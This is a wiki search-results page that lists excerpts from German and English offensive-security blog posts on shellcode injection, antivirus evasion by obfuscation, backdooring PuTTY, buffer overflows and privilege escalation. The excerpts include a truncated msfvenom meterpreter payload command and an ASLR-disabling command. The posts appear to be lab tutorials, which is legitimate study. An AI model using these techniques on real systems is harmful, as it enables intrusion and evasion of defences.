NoSociety.de

#nosoc

  • Page Tools
    Show pageOld revisionsBacklinks
  • Site Tools
    Recent ChangesMedia ManagerSitemap
  • User Tools
    Log In

Search

You can find the results of your search below.

Ends with
  • Exact match
  • Starts with
  • Ends with
  • Contains
@it-security:blog
  • Any namespace
Any time
  • Any time
  • Past week
  • Past month
  • Past year
Sort by hits
  • Sort by hits
  • Sort by last modified

Matching pagenames:

  • Backdoor development with Code Caves
  • Obfuscation: polymorpher In-Memory Decoder
  • Obfuscation: Shellcode als UUIDs tarnen
  • obfuscation_shellcode_als_uuids_tarnen_-_teil_1
  • Shellcode Injection Teil 1
  • Shellcode Injection Teil 2
  • Shellcode Injection Teil 3
  • Shellcode Injection Teil 4

Fulltext results:

Obfuscation: polymorpher In-Memory Decoder
99 Hits, Last modified: 9 months ago
en zu können. [[it-security:blog:obfuscation_shellcode_als_uuids_tarnen|Im letzten Teil]] haben wir uns mit der Tarnung von Shellcode als UUID im Quellcode befasst. Dies hat auch gut funktioniert, jedoch wurde der Shellcode im Speicher erkannt und blockiert. Das wollen wi
Shellcode Injection Teil 4
68 Hits, Last modified: 10 months ago
y Windows Kali pentest blog deutsch}} ====== Shellcode Injection Teil 4 ====== {{:it-security:blog:sc4-... des. An diesem Punkt wollte ich einen Custom-Shellcode entwickeln, um mehr über die Funktionsweise zu le... ''calc.exe'' auf einem Windows Rechner * 64-Bit Code * Vermeiden von Null-Bytes ===== Vorbereitungen ===== ==== Shellcode? Nichts leichter als das! ==== Das dachte ich zu
Shellcode Injection Teil 1
59 Hits, Last modified: 10 months ago
y windows kali pentest blog deutsch}} ====== Shellcode Injection Teil 1 ====== {{:it-security:shellcode-part1.jpg?400|}} In dieser Beitragsreihe beschäftigen wir uns mit Shellcode, wie man diesen in Prozesse einschleust und einig... . Im ersten Teil schauen wir uns an, wie man Shellcode aus einem lokalen Prozess heraus ausführt. Zusätz
Obfuscation: ByteSwapping
56 Hits, Last modified: 7 months ago
{{tag>IT-Security Windows Kali shellcode blog deutsch}} ====== Obfuscation: ByteSwapping ====== {{:it-... zten Beitrag, habe ich einen verschlüsselten Shellcode im Arbeitsspeicher entschlüsselt und ausführen la... %%''|''%%F9%%''|''%%12%%''|''%%D1%%''| ===== Der Code ===== ==== Schritt 1: Python Encoder ==== Die e... hinzu * Gib das Bytearray als Ergebnis zurück <code python> def encrypt(data: bytes, xor_key: int
Shellcode Injection Teil 3
47 Hits, Last modified: 12 months ago
y Windows Kali pentest blog deutsch}} ====== Shellcode Injection Teil 3 ====== {{:it-security:blog:shellcode-part-3.png?400|}} In der Regel werden Shellcode Injections dazu benutzt, eine Reverse Shell zu initiie... h kann es unter manchen Umständen nötig sein, den Code für die Shell erst im zweiten Schritt zu laden.
Backdoor development with Code Caves
46 Hits, Last modified: 5 months ago
{{tag>IT-Security Windows backdoor shellcode blog deutsch english}} ====== Backdoor development with Code Caves ====== {{:it-security:blog:bd-putty-header... }} In this lab, we will inject a Metasploit shellcode into the Putty program, which will be executed at... xe%%'' that is unused in the resources (so-called code caves). ===== 1.0 Introduction ===== The follow
Buffer Overflow im 64-Bit Stack - Teil 1
44 Hits, Last modified: 11 months ago
langen.((https://www.ired.team/offensive-security/code-injection-process-injection/binary-exploitation/6... s://github.com/longld/peda/blob/master/README)) <code bash> git clone https://github.com/longld/peda.gi... peda echo "source ~/peda/peda.py" >> ~/.gdbinit </code> \\ \\ ==== ASLR deaktivieren ==== ASLR muss dea... mit Speicherbereiche nicht randomisiert werden. <code bash> echo 0 | sudo tee /proc/sys/kernel/randomiz
Shellcode Injection Teil 2
41 Hits, Last modified: 10 months ago
y windows kali pentest blog deutsch}} ====== Shellcode Injection Teil 2 ====== {{:it-security:blog:shellcode-part2.jpg?400|}} In Teil 1 der Shellcode Injection Reihe haben wir eine Reverse Shell aus einem lokale... eraus gestartet. in Teil 2 schleusen wir den Shellcode direkt in einen Prozess ein. Diese Form der Injec
Buffer Overflow im 64-Bit Stack - Teil 3
40 Hits, Last modified: 4 months ago
der Funktion einen Systembefehl absetzen können <code gdb> [-------------------------------------code-------------------------------------] 0x4011de <vuln... >: mov eax,0x0 0x4011f7 <vuln+134>: leave </code> \\ \\ ===== Abhängigkeiten ===== * socat mod ... ps://docs.pwntools.com/en/stable/install.html)) <code bash> python3 -m pip install --upgrade pip python
Obfuscation: Shellcode als UUIDs tarnen
30 Hits, Last modified: 10 months ago
uscation blog deutsch}} ====== Obfuscation: Shellcode als UUIDs tarnen ====== {{:it-security:blog:a389... bp?400x200|}} Im letzten [[it-security:blog:shellcode_injection-4|Blogpost]] beschäftigten wir uns mit ... ofort blockiert. Somit musste ich Loader und Shellcode entsprechend anpassen. Mir kam die Idee, die OpC... === Tools ===== Der Encoder ist Teil meines Shellcode-Tools [[https://github.com/psycore8/shencode|Shen
Buffer Overflow im 64-Bit Stack - Teil 2
24 Hits, Last modified: 11 months ago
568|kompilierte Binary]] aus dem Blog debuggen. <code bash> br *vuln+73 # setze Breakpoint r < i... "/bin/sh") RIP: 0x400469 (<_init+25>: ret) </code> \\ \\ ===== Abhängigkeiten ===== Was wird benöt... erflow_x64|Teil 1]], benötigen wir noch ropper. <code bash> sudo apt install ropper </code> \\ \\ ===== ASLR deaktivieren ===== Auch hier muss ASLR wieder d
FatCat Attack PoC
14 Hits, Last modified: 15 months ago
um uns volle Rechte über ein System zu sichern. <code text> _____ _ ____ _ | ___|_ _| |_ ... | |_ |_| \__,_|\__|\____\__,_|\__| Attack PoC </code> \\ \\ ===== Beschreibung ===== {{page>vorlagen:... oad ==== * Metasploit starten * cmd öffnen <code dos>cmd</code> * Payload generieren <code dos>msfvenom -a x86 –platform windows -p windows/meterpre
Privilegien-Eskalation: Windows-Admin dank Linux
12 Hits, Last modified: 15 months ago
zt können wir ''chntpw'' installieren, mittels: <code bash> sudo apt install chntpw </code> \\ \\ ==== Windows Partition finden ==== Wir suchen die Windows Partition. <code bash> sudo sfdisk -l </code> {{:it-security:blog:screenshot_2024-03-14_145734.png|}} \\ \\ In unserem
obfuscation_shellcode_als_uuids_tarnen_-_teil_1
1 Hits, Last modified: 10 months ago
~~REDIRECT>it-security:blog:obfuscation_shellcode_als_uuids_tarnen~~